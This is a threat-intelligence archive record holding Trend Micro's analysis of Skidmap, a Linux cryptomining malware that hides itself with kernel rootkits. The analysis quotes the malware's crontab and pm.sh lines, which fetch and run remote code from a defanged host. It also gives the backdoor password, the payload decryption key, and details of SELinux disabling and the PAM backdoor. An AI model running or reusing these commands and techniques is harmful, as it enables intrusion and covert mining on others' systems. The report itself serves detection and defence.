{ "id": "8f930696-a467-4125-a5d0-3b8f72af5c40", "created_at": "2026-04-06T00:08:46.382848Z", "updated_at": "2026-04-10T13:12:14.730251Z", "deleted_at": null, "sha1_hash": "dfa0daf8b5dc677a57d01f068173733c74cd73b2", "title": "Skidmap Malware Uses Rootkit to Hide Mining Payload", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 85650, "plain_text": "Skidmap Malware Uses Rootkit to Hide Mining Payload\r\nPublished: 2019-09-16 · Archived: 2026-04-05 18:03:23 UTC\r\nCryptocurrency-mining malware is still a prevalent threat, as illustrated by our detections of this threat in the first\r\nhalf of 2019. Cybercriminals, too, increasingly explored new platforms and ways to further cash in on their\r\nmalware — from mobile devices and Unix and Unix-like systems to servers and cloud environments.\r\nThey also constantly hone their malware’s resilience against detection. Some, for instance, bundle their malware\r\nwith a watchdog component that ensures that the illicit cryptocurrency mining activities persist in the infected\r\nmachine, while others, affecting Linux-based systems, utilize an LD_PRELOAD-based userland rootkit to make\r\ntheir components undetectable by system monitoring tools.\r\nSkidmap, a Linux malware that we recently stumbled upon, demonstrates the increasing complexity of recent\r\ncryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to\r\nkeep its cryptocurrency mining operations under the radar.\r\nThese kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts —\r\nattackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can\r\nalso set up a secret master password that gives it access to any user account in the system. Conversely, given that\r\nmany of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits,\r\nmisconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or\r\nadministrative access to the system.\r\nFigure 1. Skidmap’s infection chain\r\nSkidmap’s infection chain\r\nThe malware installs itself via crontab (list of commands that are run on a regular schedule) to its target machine,\r\nas shown below:\r\n*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh\r\nThe installation script pm.sh then downloads the main binary “pc” (detected by Trend Micro as\r\nTrojan.Linux.SKIDMAP.UWEJX):\r\nif [ -x \"/usr/bin/wget\" -o -x \"/bin/wget\" ]; then\r\n wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc elif\r\n curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc elif\r\n get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc elif\r\n cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc else\r\n url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc fi\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/\r\nPage 1 of 4\n\nUpon execution of the “pc” binary, it will decrease the affected machine’s security settings. If the file\r\n/usr/sbin/setenforce exists, the malware executes the command, setenforce 0. This command configures the\r\nsystem’s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control\r\npolicies, into permissive mode — that is, setting the SELinux policy so that it is not enforced. If the system has\r\nthe /etc/selinux/config file, it will write these commands into the file: SELINUX=disabled and\r\nSELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded),\r\nwhile the latter sets selected processes to run in confined domains.\r\nSkidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the\r\npublic key of its handlers to the authorized_keys file, which contains keys needed for authentication.\r\nBesides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine.\r\nThe malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication)\r\nwith its own malicious version (detected as Backdoor.Linux.PAMDOR.A). As shown in Figure 2, this malicious\r\npam_unix.so file accepts a specific password for any users, thus allowing the attackers to log in as any user in the\r\nmachine.\r\nFigure 2. Code snippets showing how Skidmap gets its backdoor access to the affected system (top) and how it\r\nuses a malicious version of the pam_unix.so file to gain access to the machine (bottom; the password that it uses\r\nand accepts is Mtm$%889*G*S3%G)\r\nHow Skidmap drops the cryptocurrency miner\r\nThe “pc” binary checks whether the infected system’s OS is Debian or RHEL/CentOS. Its routine, which involves\r\ndropping the cryptocurrency miner and other components, depends on OS. For Debian-based systems, it drops the\r\ncryptocurrency miner payload to /tmp/miner2. For CentOS/RHEL systems, it will download a tar (tape archive)\r\nfile from the URL, hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz, containing the cryptocurrency miner and its multiple\r\ncomponents, which is unpacked and then installed. Of note is that the content of the tar file is decrypted via\r\nOpenSSL with the key “jcx@076” using Triple DES cipher.\r\nFigure 3. How the “pc” binary drops the cryptocurrency miner in Debian- (top) and CentOS/RHEL-based systems\r\n(bottom)\r\nSkidmap’s other malicious components\r\nThe malware has notable components that are meant to further obfuscate its malicious activities and ensure that\r\nthey continue to run:\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/\r\nPage 2 of 4\n\nA fake “rm” binary — One of the components contained in the tar file is a fake “rm” binary that will\r\nreplace the original (rm is normally used as command for deleting files). The malicious routine of this file\r\nsets up a malicious cron job that would download and execute a file. This routine won’t always be\r\nobserved, however, as it would only be performed randomly.\r\nkaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel\r\nmodules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the\r\nkernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops\r\na watchdog component that will monitor the cryptocurrency miner file and process.\r\nFigure 4. Cron job installed by Skidmap’s “rm” (top) and kaudited (middle) dropping the kernel modules; and\r\ncode snippet of the dropped watchdog component (bottom)\r\niproute — This module hooks the system call, getdents (normally used to read the contents of a directory)\r\nin order to hide specific files.\r\nFigure 5. Code snippets showing how iproute uses getdents is used to hide certain files (top, center), and how the\r\nnetlink rootkit fakes network traffic statistics (bottom)\r\nnetlink — This rootkit fakes the network traffic statistics (specifically traffic involving certain IP addresses\r\nand ports) and CPU-related statistics (hide the “pamdicks” process and CPU load). This would make the\r\nCPU load of the infected machine always appear low. This is likely to make it appear as if nothing is amiss\r\nto the user (as high CPU usage is a red flag of cryptocurrency-mining malware).\r\nFigure 6. Snapshots of code showing how the pamdicks process is hidden (top), and how it displays that the CPU\r\nload is low (bottom)\r\nBest practices and Trend Micro solutions\r\nSkidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its\r\nuse of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to\r\nclean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which\r\nallow it to reinfect systems that have been restored or cleaned up.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/\r\nPage 3 of 4\n\nCryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate\r\nto higher expenses and even disrupt businesses especially if they are used to run mission-critical operations. Given\r\nLinux’s use in many enterprise environments, its users, particularly administrators, should always adopt best\r\npractices: keep the systems and servers updated and patched (or use virtual patching for legacy systems); beware\r\nof unverified, third-party repositories; and enforce the principle of least privilege to prevent suspicious and\r\nmalicious executables or processes from running.\r\nTrend Micro solutions powered by XGen™ security, such as ServerProtect for Linux and Trend Micro Network\r\nDefense, can detect related malicious files and URLs and protect users’ systems. Trend Micro Smart Protection\r\nSuites and Trend Micro Worry-Free™ Business Security, which have behavior monitoring capabilities, can\r\nadditionally protect from these types of threats by detecting malicious files, thwarting behaviors and routines\r\nassociated with malicious activities, as well as blocking all related malicious URLs.\r\nIndicators of Compromise (IoCs)\r\nFile Name SHA-256 Trend Micro Detection\r\ncrypto514\r\nc07fe8abf4f8ba83fb95d44730efc601\r\nba9a7fc340b3bb5b4b2b2741b5e31042\r\nRootkit.Linux.SKIDMAP.A\r\niproute514\r\n3ae9b7ca11f6292ef38bd0198d7e7d0b\r\nbb14edb509fdeee34167c5194fa63462\r\nRootkit.Linux.SKIDMAP.A\r\nkaudited\r\ne6eb4093f7d958a56a5cd9252a4b529\r\nefba147c0e089567f95838067790789ee\r\nTrojan.Linux.SKIDMAP.UWEJY\r\nkswaped\r\n240ad49b6fe4f47e7bbd54530772e5d2\r\n6a695ebae154e1d8771983d9dce0e452\r\nBackdoor.Linux.SKIDMAP.A\r\nnetlink514\r\n945d6bd233a4e5e9bfb2d17ddace46f2\r\nb223555f60f230be668ee8f20ba8c33c\r\nRootkit.Linux.SKIDMAP.A\r\nsystemd_network\r\n913208a1a4843a5341231771b66bb400\r\n390bd7a96a5ce3af95ce0b80d4ed879e\r\nTrojan.Linux.SKIDMAP.A\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-m\r\nining-payload/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/" ], "report_names": [ "skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434126, "ts_updated_at": 1775826734, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.pdf", "text": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.txt", "img": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.jpg" } }